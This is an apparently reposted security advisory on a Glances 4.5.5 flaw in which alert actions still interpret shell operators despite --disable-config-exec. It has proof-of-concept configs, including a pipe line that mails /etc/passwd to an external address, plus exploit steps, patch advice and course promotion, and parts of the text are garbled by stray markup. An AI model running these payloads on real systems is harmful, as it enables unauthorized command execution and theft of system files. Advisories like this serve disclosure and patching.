Listen to this Post
In Glances 4.5.5, the `–disable-config-exec` flag was extended (GHSA-3vwc-qwhc-3mj7) to stop `secure_popen()` from interpreting the shell operators &&, |, and `>` in AMP command values taken from the configuration file. The hardening was not applied to the on-alert action command path, which reads its command lines from the same configuration file.
As a result, with `–disable-config-exec` enabled, a configured alert action that contains `>` (file redirection), `&&` (chaining), or `|` (pipe) still has those operators interpreted, allowing arbitrary file write / command chaining at the privilege of the glances process when the alert triggers.
Affected code – `glances/actions.py` (Glances 4.5.5):
ret = secure_popen(cmd_full) line 111 — no allow_operators=, defaults to True
By contrast the AMP modules were fixed:
glances/amps/default/<strong>init</strong>.py:69
self.set_result(secure_popen(res, allow_operators=self.allow_operators()).rstrip())
glances/amps/systemv/<strong>init</strong>.py:60
res = secure_popen(self.get('service_cmd'), allow_operators=self.allow_operators())
PoC (benign) – `glances.conf`:
[bash] user_critical=1 user_critical_action=echo MARKER > /tmp/poc_marker
Run `glances –disable-config-exec` and generate CPU load. When the CPU user alert reaches CRITICAL, `/tmp/poc_marker` is created — i.e. the `>` operator was interpreted despite --disable-config-exec. The same `>` in an `
` command value is correctly not interpreted. Impact – Arbitrary file write (<code>></code>), command chaining (<code>&&</code>), and pipe (<code>|</code>) from config-defined alert actions, contrary to the guarantee of <code>--disable-config-exec</code>. Trust boundary = the Glances configuration file. Suggested fix – Pass `allow_operators=not args.disable_config_exec` from `GlancesActions.run()` into `secure_popen()` (GlancesActions already holds <code>args</code>). <h2 style="color: blue;">Credit – Reported via responsible-disclosure incomplete-fix measurement study.</h2> <h2 style="color: blue;">DailyCVE Form:</h2> Platform: Glances Version: 4.5.5 and earlier Vulnerability: OS Command Injection (CWE-78) Severity: HIGH (CVSS 4.0: 7.1) Date: 2026-08-17 <h2 style="color: blue;">Prediction: Patch expected in 4.5.6 (already released)</h2> <h2 style="color: blue;">What Undercode Say:</h2> [bash] Check Glances version glances --version Verify --disable-config-exec flag behavior with alert action Create malicious config cat > glances.conf << EOF [bash] user_critical=1 user_critical_action=echo pwned > /tmp/glances_poc EOF Run with disable-config-exec glances --disable-config-exec --config glances.conf Trigger CPU alert and check file creation ls -la /tmp/glances_poc
Command chaining PoC user_critical_action=echo test && id > /tmp/chain Pipe operator PoC user_critical_action=cat /etc/passwd | mail [email protected]
Check affected code location grep -n "secure_popen" glances/actions.py Verify AMP modules are fixed grep -n "allow_operators" glances/amps//<strong>init</strong>.py
Exploit: (Educational Purposes!)
- Modify `glances.conf` – Add or modify an alert action under any monitoring section (e.g.,
</code>, <code>[bash]</code>, <code>[bash]</code>): [bash] [bash] user_critical=1 user_critical_action=malicious_command > /path/to/file
- Run Glances with `--disable-config-exec` – The flag is supposed to block shell operators but fails for alert actions.
- Trigger the alert – Generate system load or memory pressure to reach the CRITICAL threshold.
- Observe execution – The command executes with the privileges of the Glances process, allowing:
- Arbitrary file write via `>`
- Command chaining via `&&`
- Output piping via `|`
Protection:
- Upgrade to Glances 4.5.6 or later – This version fixes the issue by ensuring `GlancesActions.run()` respects `--disable-config-exec`
- Restrict write permissions on `glances.conf` – Ensure only trusted administrators can modify the configuration file - Avoid configuring alert actions that include shell operators (
>,&&,|) until upgrade - Disable alert actions if possible while awaiting upgrade
- Run Glances with least privilege – Minimize the impact of potential command execution
Impact:
- Arbitrary File Write – Attackers can write arbitrary content to any filesystem path accessible by the Glances process
- Command Chaining – Multiple commands can be executed sequentially via `&&`
- Command Piping – Output can be piped to arbitrary programs via `|`
- Privilege Escalation – Commands execute with the privileges of the Glances process - Trust Boundary Violation – The `--disable-config-exec` guarantee is broken for alert actions
- Configuration File as Attack Vector – Any attacker who can modify `glances.conf` can exploit this vulnerability
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

